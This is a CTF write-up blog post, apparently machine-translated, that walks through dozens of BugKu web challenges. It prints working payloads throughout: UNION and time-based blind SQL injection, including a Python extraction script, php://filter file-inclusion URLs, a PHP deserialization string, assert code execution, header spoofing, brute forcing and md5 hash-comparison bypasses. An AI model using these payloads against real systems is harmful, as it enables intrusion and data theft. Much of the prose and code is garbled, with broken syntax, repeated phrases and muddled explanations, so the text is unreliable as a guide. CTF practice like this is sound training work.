BugKu Web topic


This is the sixth day of my participation in the August Text Challenge.More challenges in August


1.web2

There are comments in the source codeAnswer: the KEY 2 – bugKssNNikls9100} {Web –

2. Calculator

Analytic: reference links to subject the emergence of a very simple authentication code, just enter the correct you can get the flag, but after trying to find topics of input box can only enter a number, the decisive element of review, found that the maximum length of input box is set 1, then modify the input box maxlength attribute for 5 input results are ok.

Answer: the flag} {the CTF – bugku – 0032

Web base $_GET

Topic: http://123.206.87.240:8002/get/

Analytic: according to the question, directly modify the url http://123.206.87.240:8002/get/? what=flag

Answer: the flag {bugku_get_su8kej2en} from http://123.206.87.240:8002/get/? what=flag

Web base $_POST

Parsing: The post value is

what=post
Copy the code

Methods a coolaf.com/

Method 2: Firefox HackBar sends post data,

what=flag
Copy the code

Answer: the flag {bugku_get_ssseint67se}

5, contradiction

Topic: http://123.206.87.240:8002/get/index1.php

Resolution:

$num=$_GET['num'];//GET to obtain parameters
if(! is_numeric($num))// the is_numeric () function is used to determine whether numeric is numeric or a numeric string with bool is_numeric (mixed $var)
 
{
echo $num;
if($num= =1)// The contradiction is both 1 and not a number
echo 'flag{**********}';
}

Copy the code

Construct payload statement num=1e0.1

http:/ / 123.206.87.240:8002 / get/index1. PHP? Num = 1 * e * 0.1
Copy the code

Answer: the flag {bugku – 789 – ps – SSDF}

6.web3

The last line looks like this,

<! - the & # 75; The & # 69; The & # 89; The & # 123; The & # 74; & # 50; The & # 115; The & # 97; & # 52; & # 50; The & # 97; The & # 104; The & # 74; The & # 75; & # 45; The & # 72; The & # 83; & # 49; & # 49; The & # 73; The & # 73; The & # 73; The & # 125; -->
 
Copy the code

Using HTML decoding, get the flag from www.jianshu.com/p/6750db094…

Decoding tools www.convertstring.com/zh_CN/Encod…

Get the flag

KEY{J2sa42ahJK-HS11III}

7 Domain name resolution Modify the host file and visit flag.baidu.com

8. You have to make it stop

flag{dummy_game_1s_s0_popular}

9. Local contains

http://123.206.87.240:8003/

(1) From the title, it can be seen that there is an attack on local files. (When the programmer builds the website, he calls the local files in the script for convenience. We can take advantage of this vulnerability to call the files we want.)

(2) The code is as follows:


      
    include "flag.php"; 
    $a = @$_REQUEST['hello'];
    eval("var_dump($a);");
    show_source(__FILE__);
? >
Copy the code

A, include “flag.php” He included the flag we wanted, what a heh heh heh

Request and _request are super global variables like _GET and $_POST, but runtime changes to the latter do not affect the former or vice versa

C) Submit things with the name hello via get/ POST /cookies, etc

D. The eval function executes a string as a command

E. The last sentence highlights the code on this page

(4). Create an attack command named hello to output the code in flag.php as an array. (5)

? hello=file("flag.php")Copy the code

(6) Explanation of attack:

The a, file() function reads a file and returns it as an array

http://123.206.87.240:8003/?hello=file (% 22 flag. The PHP % 22)

flag{bug-ctf-gg-99}

From http://123.206.87.240:8003/? hello=file(%22flag.php%22)

10. Variable 1

Title: Flag In the variable!


        
 
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(! preg_match("/^\w+$/".$args)) {die("args error!");
    }
    eval("var_dump($$args);");
}
? >
Copy the code

Preg_match is used to perform a regular expression match. The eval() function executes the string as PHP code. Var_dump () prints information about variables. [\w+] matches the characters of digits, letters, underscores, and plus signs. Eval (“var_dump($$args);” ); Var_dump is a variable named by args. Args is a variable named by args. Args is a variable named by args. GLOBLES variables. GLOBLES variables. GLOBALS – is an array that contains all variables available in the global scope. The name of the variable is the key of the array.

A mutable variable is a unique class of variables that allows a variable name to change dynamically. The way it works is that the name of the variable is determined by the value of another variable, by adding a dollar sign “$” in front of the variable, so just pass a global variable, construct”? Args = GLOBALS “namely: http://123.206.87.240:8004/index1.php? args=GLOBALS

flag{92853051ab894a64f7865cf3c2128b34}

11 Web5

SPFUCK??????

ctf{whatfk}

Reason: the CTF {WHATFK}

12 class

(1) Configure the BURp suite. (2) Find the Flag in the response header

flag{Bugku_k8_23s_istra}

13 The website was hacked

Dry: no technical content of the questions but often encountered in actual combat, http://123.206.87.240:8002/webshell/

Actual combat often encounter website is black generally there will be shell, with the royal sword scan, found

Go to http://123.206.87.240:8002/webshell/shell.php

Use BurpSuite to blast passwords as hacks

Hack_bug_ku035}

14 Administrator System

Reopen the web page and view the source code

To base decryption tool.chinaz.com/Tools/Base6 dGVzdDEyMw = =… Test123, try admin using test123

Please contact your local administrator to log in. The IP address is set to X-Forwarded-For (XFF). This header represents the client.

Consider masquerading cost of access, capturing and changing packets, forging an XFF header, and masquerading cost of login

1 X - Forwarded_For: 127.0.0.1Copy the code

Then go to the Repeater module

Click on the go,

Namely: the flag {85 ff2ee4171396724bae20c0bd851f6b}

15 web4

View the source code to find three sections of URL encoding, URL decoding obtained

Were eval function after decoding as statement execution, check stitching to MD5 value: 67 d709b2b54aa2aa648cf6e87a7114f1, submit the flag can be calculated out

KEY{J22JK-HS11}

16, Flag is in index

File contains

PHP ://filter

Blog.csdn.net/anjiaowangm…

After clicking on Url into http://123.206.87.240:8005/post/index.php? File =show.php Here we see the file keyword

So we thought about the PHP: / / filter, specific auspicious see above reference articles to http://123.206.87.240:8005/post/index.php? file=php://filter/read=convert.base64-encode/resource=index.php

Then base64 decryption is performed to obtain flag flag{edulcni_ELif_LACol_SI_siHT}

17. Enter the password to view the flag

Password is five digit password, so burpSuite burst (1) configure browser proxy

(2) Enable the burP proxy function and configure the same address/port

(3) Enable the agent

(4) Detailed explanation of blasting process

You can see that Burp has grabbed the password just entered,

If HTTPS is selected, select the HTTPS option

Payload SET parameter = Payload SET parameter = Payload SET parameter = Payload SET parameter = Payload SET parameter = Payload SET parameter = Payload SET parameter = Payload SET parameter = Payload SET parameter = Payload SET parameter = Payload SET parameter = Payload SET parameter

Option can also set thread, set to 100, top right start attack

You can then click Length to see which return value is different from the others, and this must be the password, because this is the only one that succeeded

Enter the password 12379

Get: flag {bugku baopo – hah}

18. One million hits

The source code

<script>
    var clicks=0
    $(function() {$("#cookie")
        .mousedown(function() {$(this).width('350px').height('350px');
        })
        .mouseup(function() {$(this).width('375px').height('375px');
          clicks++;
          $("#clickcount").text(clicks);
          if(clicks >= 1000000) {var form = $('<form action="" method="post">' +
'<input type="text" name="clicks" value="' + clicks + '" hidden/>' +
'</form>');
$('body').append(form); form.submit(); }}); }); </script>Copy the code

Script blasting

import requests,re
r = requests.post('http://123.206.87.240:9001/test/',data={'clicks':1000000})
a = re.findall(r'flag{(.*)}', r.text)
print('flag{%s}'%a[0])
Copy the code

flag{Not_C00kI3Cl1ck3r}

Backup is a good habit

After opening the page: D41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e method (1) to try all kinds of encryption, back to the topic, the backup Commonly used way of backup files, Bak http://123.206.87.240:8002/web16/ http://123.206.87.240:8002/web16/index.php http://123.206.87.240:8002/web16/index.php.bak method (2) the source leak tool, can automatically access common CTF clue file, if it returns to normal file exists.

git clone https://git.coding.net/yihangwang/SourceLeakHacker.git
Copy the code

Usage : python SourceLeakHackerForLinux.py [URL] Example : python SourceLeakHackerForLinux.py www.baidu.com/ Tips : Your URL should must starts with “http://” or “https://” If you have any questions, please contact [ [email protected] ]

Python SourceLeakHackerForLinux. Py at http://123.206.87.240:8002/web16/Copy the code

If the status codes of index.php and index.php.bak are 200, the file exists

Method (3) Scanning with imperial sword

Download to get index.php.bak file remove.bak, and analyze,


      
/** * Created by PhpStorm. * User: Norse * Date: 2017/8/6 * Time: 20:22 */
 
include_once "flag.php";
ini_set("display_errors".0);
$str = strstr($_SERVER['REQUEST_URI'].'? ');/* # STRSTR get URI from '? 'after (including '? '), */
$str = substr($str.1);
$str = str_replace('key'.' '.$str);/*# replace the string 'key' with an empty */
parse_str($str);
echo md5($key1);
 
echo md5($key2);
if(md5($key1) == md5($key2) && $key1! = =$key2) {/*#md5key1 = md5key2 and key1 is not exactly equal to key2*/
    echo $flag."Flag";
}
? >
Copy the code

Analytic: will get two parameters of the key replacement is empty (can use kekeyy around here), then the key1, key2 value md5 encryption, and the comparison If the value of the md5 encryption and unencrypted values is different, it outputs a flag. The md5() function can’t handle arrays. If an array is passed in, it returns NULL, so both arrays are encrypted to be NULL, i.e. equal. http://123.206.87.240:8002/web16/?kkeyey1 [] = 1 & kkeyey2 [] = 2, using the = = comparison

If two characters have an MD5 encrypted value of the form 0exxxxx, it is considered scientific notation and is equal to 0*10 ^ XXXX or zero.

The MD5 values of the following strings start with 0E: QNKCDZO 240610708 s878926199a s155964671A s214587387a s214587387a

http://123.206.87.240:8002/web16/index.php?kekeyy1=s878926199a&kekeyy2=s214587387a

Bugku{OH_YOU_FIND_MY_MOMY}

20. Transcript inquiry

Transcripts will quickly check result http://120.24.86.145:8002/chengjidan/ simple SQL injection

Url: http://120.24.86.145:8002/chengjidan/index.php post: id = 2'and 1=0 union select 1,2,3,group_concat(table_name) from information_schema.tables WHERE table_schema=database()# //fl4g,sc id=2'And 1=0 union select 1,2,3,group_concat(column_name) from information_schema.columnswhere table_schema=database() and table_name=0x666c3467#
//skctf_flag
 
id=2'and 1=0 union select 1, 3,skctf_flag from fl4g# //BUGKU{Sql_INJECT0N_4813drd8hz4}Copy the code

From findneo. Making. IO / 180406 bugku…

BUGKU{Sql_INJECT0N_4813drd8hz4}

Autumn famous mountain old driver

Quick calculations using scripts

import requests,re
 
def main() :
    url = 'http://123.206.87.240:8002/qiumingshan/'
    s = requests.session()
    r = s.get(url)
    # r.encoding = 'utf-8'
    a = re.findall(r'
      
(.*)=\? ;
'
,r.text) # print(r.text) a = eval(a[0]) # convert string formulas to formulas r = s.post(url,data={'value':a}) r.encoding = 'utf-8' print(r.text) main() Copy the code

Bugku{YOU_DID_IT_BY_SECOND}

22 fast to view the web source code

(1) a post request with a margin attribute is required. (2) a post request with a margin attribute is required. (3) A post request with a margin attribute is required. Then through Python, get the flag in the header, and construct a POST request, put the flag in the margin and send it out

import requests
import base64
url="http://123.206.87.240:8002/web6/"
r=requests.session()
headers=r.get(url).headers# Because flag is in the header
 
mid=base64.b64decode(headers['flag'])
mid=mid.decode()In order to split the next step, b64decode will operate on a string of type byte, while split will use STR
 
flag = base64.b64decode(mid.split(':') [1])# get the value after flag:
data={'margin':flag}
print (r.post(url,data).text)#post method pass
Copy the code

KEY{111dd62fcd377076be18a}

23. Cookies fraud

www.cnblogs.com/izayoi/p/97…

(1) open the web page after a bunch of gibberish, each line is: rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibry

(2) the original url has two parameters line = filename = a2V5cy50eHQ = (3) with base64 decoding tool.chinaz.com/Tools/Base6 a2V5cy50eHQ =… The filename parameter determines the page to be returned (possibly source code), and the passed parameter is base64 ciphertext, which is passed to the background base64.decode().

Then pass index.php, the base64 ciphertext is aW5kZXgucGhw

Go to http://123.206.87.240:8002/web11/index.php? Line =&filename=aW5kZXgucGhw Result empty (4) Does the line argument determine which line to return? (5) Use scripts to crawl all the code

import requests
ses=requests.session()
url='http://123.206.87.240:8002/web11/index.php'
for i in range(0.30):
payload={'line':i,'filename':'aW5kZXgucGhw'}result=ses.get(url,params=payload).text
print(result)
Copy the code

Or code

import requests
a =20
for i in range(a):
        url = "Http://123.206.87.240:8002/web11/index.php? line=%d&filename=aW5kZXgucGhw" %i
        r = requests.get(url)
        print (r.text)
Copy the code

get


      
 
error_reporting(0);
 
$file=base64_decode(isset($_GET['filename'])?$_GET['filename'] :"");
 
$line=isset($_GET['line'])? intval($_GET['line') :0;
 
if($file= =' ') header("location:index.php? line=&filename=a2V5cy50eHQ=");
 
$file_list = array(
 
'0'= >'keys.txt'.'1'= >'index.php',);if(isset($_COOKIE['margin'&&])$_COOKIE['margin'] = ='margin') {# Cookie =margin
 
$file_list[2] ='keys.php';   # access keys. PHP
 
}
 
if(in_array($file.$file_list)) {$fa = file($file);
 
echo $fa[$line];
 
}
 
? >	 
Copy the code

KEY{key_keys}

From findneo. Making. IO / 180406 bugku…

24, Never give up

F12 look at the source page, nothing, there is a 1p.html at the top

Use the view – open source: browser input: the view – source: http://123.206.87.240:8006/test/1p.html

 <HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<! -- var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR 0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwO WV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQ SUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN 25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dld F9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJ TIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlM jglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlc XVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyM GdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E" function OutWord() { var NewWords; NewWords = unescape(Words); document.write(NewWords); } OutWord(); // -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
Copy the code

And the content of the var Words url decoding tool.chinaz.com/Tools/Base6… For intermediate content, Base64 decoding tool.chinaz.com/Tools/Base6… Replace, and then url decoding

<script>window.location.href='http://www.bugku.com'; </script> <! --"; if(! $_GET['id']) { header('Location: hello.php? id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')) { echo 'no no no no no no no'; return ; } $data = @file_get_contents($a,'r'); if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111"Substr ($b, 0, 1),"1114") and substr ($b, 0, 1)! =4) { require("f4l2a3g.txt");
}
else
{
print "never never never give up !!!"; }? >-->Copy the code

Visit http://123.206.87.240:8006/test/f4l2a3g.txt to get flag {tHis_iS_THe_fLaG}

Welcome to bugkuctf

Blog.csdn.net/csu_vc/arti… PHP ://filter and PHP ://input

<! -- $user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r') = = ="welcome to the bugkuctf")){  
    echo "hello admin! 

"
; include($file); //hint.php }else{ echo "you are not admin ! "; } -- >Copy the code

The file_get_contents() function reads the entire file into a string. ② With the include or require statement, you can insert the contents of a PHP file into another PHP file (before the server executes it). Require generates fatal errors (E_COMPILE_ERROR) and stops the script; Include only generates E_WARNING, and the script continues.

TXT = PHP ://input post welcome to the bugkuctf data protocol TXT =data:text/plain,welcome to the bugkuctf or TXT =data:text/plain,welcome to the bugkuctf http://123.206.87.240:8006/test1/index.php? txt=data:text/plain,welcome%20to%20the%20bugkuctf

PHP file= PHP ://filter/read=convert.base64-encode/resource=hint.php & the file = PHP: / / filter/read. = the convert base64 encode/resource = hint. PHP, http://123.206.87.240:8006/test1/index.php? txt=data:text/plain,welcome%20to%20the%20bugkuctf&file=php://filter/read=convert.base64-encode/resource=hint.php Find base64 encoded field base64 decoding tool.chinaz.com/Tools/Base6… Get the hint source


        
  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
echo "<br>";
return ("good"); }}}? >  
Copy the code

Flag.php An error may occur if you use the same method to view flag.php directly

Then, do the same for index.php

Base decoding,


        
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
  
if(isset($txt)&&(file_get_contents($txt.'r') = = ="welcome to the bugkuctf")) {echo "hello friend! 

"
; if(preg_match("/flag/".$file)) {echo "I can't give you a flag right now."; exit(a); }else{ include($file); $password = unserialize($password); echo $password; }}else{ echo "you are not the number of bugku ! "; } ? ><! --$user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user.'r') = = ="welcome to the bugkuctf")) {echo "hello admin!

"
; include($file); //hint.php }else{ echo "you are not admin ! "; } -- >Copy the code

PHP displays flag.php. The index. PHP keyword is preg_match

The __tostring method is a function that is automatically executed when the class is executed as a string. The __tostring method outputs the contents of the file as the file name. Combined with the prompt flag.php, guess the masked flag.php file is opened here 4. PHP file as the file name output file content, combined with the prompt flag.php, guess shielded flag.php file opened here 4. PHP file as the file name output file content, combined with the prompt flag.php, guess shielded flag.php file opened here 4. __toString (); echo (); echo (); echo (); The string variable password is of Flag type, and the string variable flie=flag.php is ok

Also notice that password=unserialize(password); Payload = O:4:”Flag”:1:{s:4:”file”; s:8:”flag.php”; }

http://123.206.87.240:8006/test1/index.php?txt=data:text/plain, welcome to the bugkuctf & file = hint. PHP &password=O:4:”Flag”:1:{s:4:”file”; s:8:”flag.php”; }

Get the flag flag {php_is_the_best_language}

A dog word

They give us a hint of 1


       
$poc="a#s#s#e#r#t"; 
$poc_1=explode("#".$poc);
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s'])
? >
Copy the code

Separator (string,limit) : Explodes (separator,string,limit) into an array. This code splits $POc into an array with “#” and then redrills each section to become “assert”. You can execute arbitrary code with Assert. http://123.206.87.240:8010/?s=var_dump (scandir (‘/’))

array(6) {[0]=&gt;
  string(1) "."
  [1]=&gt;
  string(2) ".."
  [2]=&gt;
  string(8) "f14g.txt"
  [3]=&gt;
  string(9) "index.php"
  [4]=&gt;
  string(4) "xxxx"
  [5]=&gt;
  string(19) "Everyone is responsible for protecting CTF. TXT"
}
Copy the code

can you get flag? http://123.206.87.240:8010/f14g.txt get flag BUGKU {bugku_web_009801_a}

27. Characters? Regular?

Title address: http://123.206.87.240:8002/web10/


       
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/ key. The * key. {4, 7} key: \ /. / / (. * key) [a-z] [[: punct:]] / I", trim($_GET["id"]), $match);
if( $IM) {die('key is: '.$key);
}
? >
Copy the code

Give id according to the conditions of the regular expression assignment, you can use the following assignment is this: http://123.206.87.240:8002/web10/? Id = / keyaakeyaaaaakey: / a/aakeya % 27 / I get flag: the key is: key x0sioph550afc {0}

28. Ex-girlfriend

On the http://123.206.31.85:49162/code.txt


      
if(isset($_GET['v1'&&])isset($_GET['v2'&&])isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1! =$v2 && md5($v1) == md5($v2)) {if(! strcmp($v3.$flag)) {echo $flag; }}}? >
Copy the code

It basically means V1! =v2, md5 value is equal, as mentioned before, is 240610708 and QNKCDZO, then compare v3 and flag, here takes advantage of a STRCMP vulnerability, can not compare arrays, here I construct as follows:

Get the flag SKCTF {Php_1s_tH3_B3St_L4NgUag3}

29, login1

Hint :SQL constraint attack

A constraint attack works by creating an account with the name ‘admin ‘(multiple Spaces, three here) and password ‘123’ (you can customize the password), and then logging in successfully, but the database returns the first user in the table, that is, the real user admin. Mysql has fixed the bug), then you can log in as admin and get flags. Here I registered the account as’ admin ‘(six Spaces), password as’ ABCabc123′ and successfully got the flag as the administrator

SKCTF{4Dm1n_HaV3_GreAt_p0w3R}

From findneo. Making. IO / 180406 bugku…

Where are you from

http://123.206.87.240:9009/from.php

1 2 3 4 5 6 7 8 HTTP_REFERER The HTTP Referer is part of the header, and when a browser sends a request to a Web server, it usually carries the Referer with it to tell the server what page it is linking to, so that the server can get some information for processing. In short, the HTTP Referer is part of the header, and when a browser sends a request to a Web server, it usually carries the Referer with it, telling the server what page I’m linking from, so that the server can get some information for processing. For example, when I link to a friend’s site from my home page, his server can calculate from HTTP Referer how many users click on my home page to visit his site every day. The correct English spelling of Referer is referrer. Due to spelling errors in the early HTTP specification, the error was made in order to maintain backward compatibility. Specifications for other web technologies attempt to fix this problem by using correct spelling, so the current spelling is not uniform. Method 1 right-click and send it to the Reoeater

Add referer: www.google.com click “Go”

Get flag method ② use hackbar plug-in

http://123.206.87.240:9009/from.php

www.google.com

flag{bug-ku_ai_admin}

31, md5 collision (NUPT_CTF)

In PHP files, if the md5 value starts with 0e, PHP will consider the two values to be equal. So I could write a script to run one that starts with 0e.

The following list can be used directly

Summary of MD5 values starting with 0e

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
Copy the code

http://123.206.87.240:9009/md5.php?a=s878926199a flag {md5_collision_is_easy}

32, programmer local site

Blog.csdn.net/qq_26090065… flag{loc-al-h-o-st1}

All kinds of bypass

After opening


       
highlight_file('flag.php'); 
$_GET['id'] = urldecode($_GET['id']); 
$flag = 'flag{xxxxxxxxxxxxxxxxxx}'; 
if (isset($_GET['uname']) and isset($_POST['passwd']) {if ($_GET['uname'] = =$_POST['passwd']) 
 
        print 'passwd can not be uname.'; 
 
    else if (sha1($_GET['uname']) === sha1($_POST['passwd']) & ($_GET['id'] = ='margin')) 
 
        die('Flag: '.$flag); 
 
    else 
 
        print 'sorry! '; 
 
} 
? >
Copy the code

http://123.206.87.240:8002/web7/flag.php, analysis the most began to get id need to use the code urldecode decoding (if not url encoding, decoding, or anything of the original)

In the first line of comparison, uname must! =passwd to continue

In the second comparison, SHA1 is a hash algorithm that can be bypassed using arrays

Such content is relatively simple, here I enclosed my content http://123.206.87.240:8002/web7/? uname[]=1 &id=margin

flag{HACK_45hhs_213sDD}

34, Web8

Tip: TXT ???? After open the http://123.206.87.240:8002/web8/ links


      
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac= = =$f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "

sorry!

"
; }}? > Copy the code

PHP ://input: ac=flags&fn=flag.txt

http://123.206.87.240:8002/web8/? Ac = flags and fn = flag. TXT

Get the flag flag cfb7a90fc0de31 {3}

35, careful

Address: http://123.206.87.240:8002/web13/ to find a way to become on the admin

The two links open nothing at all. The two links open nothing at all. The two links open nothing at all

http://123.206.87.240:8002/web13/robots.txt to get new tips

http://123.206.87.240:8002/web13/resusl.php

Tectonic x = admin directly to http://123.206.87.240:8002/web13/resusl.php? x=admin

or

Get the flag flag (ctf_0098_lkji -s)

36 getshell, o

// It is not allowed to upload PHP scripts. www.cnblogs.com/RenoStudio/… KEY{bb35dc123820e}

Suffix blacklist detection and type detection

INSERT INTO

The problem gives the code

error_reporting(0);
 
function getIp(){
$ip = ' ';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(', ', $ip);
return $ip_arr[0];
 
}
 
$host="localhost";
$user="";
$pass="";
$db="";
 
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
 
mysql_select_db($db) or die("Unable to select database");
 
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
Copy the code

Observe the program, the program closed the error report, roughly meaning the visitor’S IP record to the database for query. X_FORWARDED_FOR = 101.130.55.133 your IP is :101.130.55.133 Select case when XXX then XXX else XXX end; select case when XXX then XXX else XXX end; Substr/substring/substring/substr/substring 1 11’+(select case when substr((select flag from flag) from 1 for 1)=’a’ then sleep(5) else 0 end))%23

#-*- encoding: utf-8 -*-
 
import requests
import string 
 
mystring = string.ascii_letters+string.digits
url="http://123.206.87.240:8002/web15/"
data = "127.0.0.1'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep(5) else 1 end) and '1' = '1"  {} corresponds to the format needed later
flag = ' '
 
for i in range(1.35) :for j in mystring:
        try:
            headers = {'x-forwarded-for':data.format(str(i),j)}
            res = requests.get(url,headers=headers,timeout=3)
        except requests.exceptions.ReadTimeout:
            flag += j
            print flag
            break
 
print 'The final flag:'+flag
Copy the code

flag{cdbf14c9551d5be5612f7bb5d2867853}

This is a magic login box

www.qingpingshan.com/m/view.php?… flag{ed6b28e684817d9efcaf802979e57aea}

39, multiple

parsing

Blog.csdn.net/xuchen16/ar…

Flag {bugku sql_6s – 2 I – 4 t – bug} from www.jianshu.com/p/ae6e5a885…

40, PHP_encrypt_1 (ISCCCTF)

Dry: fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA = give the encrypted source at the same time


      
function encrypt($data.$key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i{+ +)if ($x= =$klen)
        {
            $x = 0;
        }
        $char. =$key[$x];
        $x+ =1;
    }
    for ($i=0; $i < $len; $i{+ +)$str .= chr((ord($data[$i]) + ord($char[$i)) %128);
    }
    return base64_encode($str);
}
? >
Copy the code

Give the decryption code directly


      
function decrypt($str) {
    $mkey = "729623334f0aa2784a1599fd374c120d";
    $klen = strlen($mkey);
    $tmp = $str;
    $tmp = base64_decode($tmp);  // Decode the string after base64
    $md_len = strlen($tmp); // Get the length of the string
    for ($i=0; $i < $md_len; $i{+ +)// select key for secondary encryption;
        if ($x= =$klen)  // Check whether the data length exceeds the key length
            $x = 0;
        $char. =$mkey[$x];  // Get the secondary encryption key from key
        $x+ =1;
    }
    $md_data = array(a);for($i=0;$i<$md_len;$i{+ +)// Obtain the offset ciphertext data
        array_push($md_data, ord($tmp[$i]));
    }
    $md_data_source = array(a);$data1 = "";
    $data2 = "";
    foreach ($md_data as $key= >$value) { // Restore the offset ciphertext data
        $i = $key;
        if($i >= strlen($mkey)) {$i = $i - strlen($mkey); }$dd = $value;
        $od = ord($mkey[$i]);
        array_push($md_data_source.$dd);
        $data1 .= chr(($dd+128) -$od);  // The first possibility is that the remainder +128-key is the regression number
        $data2 .= chr($dd-$od);  // The second possibility is that the remainder is directly -key
    }
    print "data1 => ".$data1."<br>\n";
    print "data2 => ".$data2."<br>\n";
}
$str = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";
decrypt($str);
? >
Copy the code

Flag format is also drunk… Flag:{asdqwdfasfdawfefqwdqwdadwqadawd}

41. The file contains 2

PHP ://filter is used to read the source code

But I found an Upload by blasting it with the imperial sword

Flag.php is found. Open flag.php

SKCTF{uP104D_1nclud3_426fh8_is_Fun}

42, flag. PHP

http://123.206.87.240:8002/flagphp/ dry: ordered login zha didn’t prompt response: hint

Findneo. Making. IO / 180406 bugku…

flag{unserialize_by_virink}

43. SQL injection 2

Didn’t find the injection point injection, the result anyway, finally, no way out, to sweep directory file, found DS_Store source revealed, then the source to get down, and finally to http://120.24.86.145:8007/web2/flag directly

Flag: flag{sql_iNJEct_comMon3600! }

Sun XX’s blog

http://123.206.87.240:2014/

45. Trim’s diary

Don’t give up at once or Give up as soon as possible… I login injection is very weak, royal sword to scan, get a http://123.206.87.240:9002/show.php. Visit this page, flag, why 200 points…

From blog.csdn.net/zz_Caleb/ar…

flag1:{0/m9o9PDtcSyu7Tt}

46, login2 (SKCTF)

http://123.206.31.85:49165/ SKCTF {XXXXXXXXXXXXXXXXXXXXX} hint: union, command execution

SKCTF{Uni0n_@nd_c0mM4nD_exEc}

From blog.csdn.net/zazazrt/art…

47, login3 (SKCTF)

